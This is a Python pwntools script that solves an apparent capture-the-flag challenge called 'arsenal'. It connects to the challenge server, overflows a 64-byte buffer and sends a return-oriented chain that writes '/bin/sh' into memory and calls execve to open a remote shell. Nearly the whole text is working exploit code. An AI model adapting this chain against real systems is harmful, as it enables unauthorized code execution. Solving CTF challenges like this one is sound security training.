from pwn import *

OFF = 64
context.binary = elf = ELF("./arsenal", checksec=False)
shellstr = b"/bin/sh\x00"
ret = 0x000000000040101A
pop_rdi = 0x000000000040196E
pop_rsi = 0x0000000000401977
pop_rdx = 0x0000000000401980
pop_rax = 0x0000000000401989  # Assign 59 (execve) to rax
syscall = 0x0000000000401324
WRITE_ADDR = 0x4AA000
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13594)
print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))
mov_qword_ptr_rdx_rax = 0x000000000040AB18  # mov qword ptr [rdx], rax; ret
payload = flat(
    b"A" * OFF,
    p64(ret),
    p64(pop_rdx),
    p64(WRITE_ADDR),
    p64(pop_rax),
    shellstr,
    p64(mov_qword_ptr_rdx_rax),  # Write /bin/sh to a writable address in memory
    p64(pop_rax),
    p64(0x3B),  # 59 is the execve syscall
    p64(pop_rdi),
    p64(
        WRITE_ADDR
    ),  # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
    p64(pop_rsi),
    p64(0),
    p64(pop_rdx),
    p64(0),
    p64(syscall),
)
p.sendline(payload)
p.interactive()